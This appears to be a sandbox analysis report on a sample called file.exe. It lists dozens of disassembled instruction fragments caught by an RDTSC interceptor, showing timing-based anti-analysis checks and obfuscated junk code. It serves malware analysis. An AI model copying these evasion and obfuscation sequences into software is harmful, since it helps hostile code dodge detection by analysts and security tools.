Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751EDD second address: 751EEA instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1CCF9D8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751EEA second address: 751EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75202B second address: 75203A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jg 00007FA1CCF9D8B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752ACA second address: 752ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752ACE second address: 752ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752ADA second address: 752ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752ADE second address: 752B05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f jmp 00007FA1CCF9D8C8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753519 second address: 75351F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75351F second address: 75352F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7536B9 second address: 7536BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7498C4 second address: 7498CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757294 second address: 757298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757298 second address: 7572A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7572A0 second address: 7572A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7598B2 second address: 7598BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FA1CCF9D8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7598BC second address: 7598DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2155h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7598DD second address: 7598FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7598FE second address: 759902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759902 second address: 759917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b je 00007FA1CCF9D8D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759A21 second address: 759A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759A25 second address: 759A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759A2B second address: 759A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759A32 second address: 759A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA1CCF9D8C7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C1C7 second address: 71C1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C1CD second address: 71C214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c jl 00007FA1CCF9D8CFh 0x00000012 jmp 00007FA1CCF9D8C9h 0x00000017 pushad 0x00000018 jne 00007FA1CCF9D8B6h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007FA1CCF9D8B6h 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7298D7 second address: 7298E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1CCCD2146h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7298E7 second address: 7298F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA1CCF9D8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7601D5 second address: 7601FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA1CCCD2146h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007FA1CCCD2152h 0x00000011 jno 00007FA1CCCD2146h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7601FC second address: 760201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 760354 second address: 76036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1CCCD2146h 0x0000000a popad 0x0000000b jmp 00007FA1CCCD214Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76036B second address: 760375 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1CCF9D8C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 760375 second address: 76038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA1CCCD2146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jnp 00007FA1CCCD2146h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76038B second address: 760390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7604EF second address: 7604F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 760936 second address: 760955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 760955 second address: 760959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762BEE second address: 762BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763022 second address: 763028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763028 second address: 76302C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76365F second address: 763675 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1CCCD214Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763675 second address: 763679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763990 second address: 763996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763996 second address: 7639A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FA1CCF9D8BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763B96 second address: 763BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763BA9 second address: 763BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763BBA second address: 763BCC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763BCC second address: 763BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763BD1 second address: 763BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA1CCCD2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763BDB second address: 763C18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1CCF9D8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FA1CCF9D8B8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 pushad 0x00000028 mov ax, E592h 0x0000002c movzx ecx, dx 0x0000002f popad 0x00000030 movsx esi, dx 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763C18 second address: 763C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 764BF5 second address: 764BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 764BF9 second address: 764BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 764BFF second address: 764C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 765CA2 second address: 765CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 765CB8 second address: 765CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 765CBC second address: 765CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 765CC0 second address: 765CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FA1CCF9D8B8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76673E second address: 7667C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FA1CCCD2150h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FA1CCCD2148h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov di, dx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FA1CCCD2148h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a or di, 93A0h 0x0000004f sub dword ptr [ebp+1244A315h], ecx 0x00000055 push 00000000h 0x00000057 jnl 00007FA1CCCD2146h 0x0000005d push eax 0x0000005e pushad 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766504 second address: 76651E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7671ED second address: 767215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA1CCCD2154h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FA1CCCD2148h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767215 second address: 767219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767219 second address: 76721D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767D9A second address: 767E18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+122D1B70h], ecx 0x00000013 push 00000000h 0x00000015 jo 00007FA1CCF9D8BBh 0x0000001b sbb si, DA6Bh 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FA1CCF9D8B8h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c jl 00007FA1CCF9D8B7h 0x00000042 clc 0x00000043 xchg eax, ebx 0x00000044 jns 00007FA1CCF9D8C0h 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d push edx 0x0000004e pop edx 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 popad 0x00000052 jc 00007FA1CCF9D8BCh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7688B8 second address: 768961 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FA1CCCD2148h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 movzx esi, si 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FA1CCCD2148h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov di, si 0x00000049 push 00000000h 0x0000004b pushad 0x0000004c call 00007FA1CCCD214Fh 0x00000051 pushad 0x00000052 popad 0x00000053 pop edx 0x00000054 sub dword ptr [ebp+122D289Ch], ecx 0x0000005a popad 0x0000005b xchg eax, ebx 0x0000005c jnl 00007FA1CCCD2161h 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push esi 0x00000067 pop esi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76C28B second address: 76C291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E0EB second address: 76E109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FA1CCCD2146h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E109 second address: 76E176 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FA1CCF9D8B8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2974h], ecx 0x00000028 or dword ptr [ebp+122D3271h], eax 0x0000002e mov dword ptr [ebp+122D179Bh], eax 0x00000034 push 00000000h 0x00000036 xor bh, FFFFFFD1h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FA1CCF9D8B8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E176 second address: 76E17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E17A second address: 76E194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76EEF3 second address: 76EF7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA1CCCD2148h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 movzx ebx, bx 0x00000029 mov edi, 5D20CE31h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FA1CCCD2148h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push ecx 0x0000004f call 00007FA1CCCD2148h 0x00000054 pop ecx 0x00000055 mov dword ptr [esp+04h], ecx 0x00000059 add dword ptr [esp+04h], 0000001Ah 0x00000061 inc ecx 0x00000062 push ecx 0x00000063 ret 0x00000064 pop ecx 0x00000065 ret 0x00000066 push eax 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E2F8 second address: 76E30E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76FFB9 second address: 770009 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1CCCD214Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA1CCCD2148h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov di, 2E7Ch 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 mov esi, dword ptr [ebp+122D3560h] 0x00000036 mov ah, 0Bh 0x00000038 popad 0x00000039 push eax 0x0000003a pushad 0x0000003b jnc 00007FA1CCCD2148h 0x00000041 push eax 0x00000042 push edx 0x00000043 push edi 0x00000044 pop edi 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F208 second address: 76F20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 770FCF second address: 770FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 770FD3 second address: 771012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8BBh 0x00000008 jmp 00007FA1CCF9D8C3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FA1CCF9D8C6h 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 773411 second address: 773490 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FA1CCCD2148h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c call 00007FA1CCCD2154h 0x00000031 call 00007FA1CCCD2155h 0x00000036 add edi, dword ptr [ebp+122D2856h] 0x0000003c pop edi 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 pushad 0x00000041 stc 0x00000042 mov edx, dword ptr [ebp+122D1889h] 0x00000048 popad 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c push edx 0x0000004d stc 0x0000004e pop edi 0x0000004f pop edi 0x00000050 push eax 0x00000051 pushad 0x00000052 push ebx 0x00000053 pushad 0x00000054 popad 0x00000055 pop ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 pop edi 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 775359 second address: 77535D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
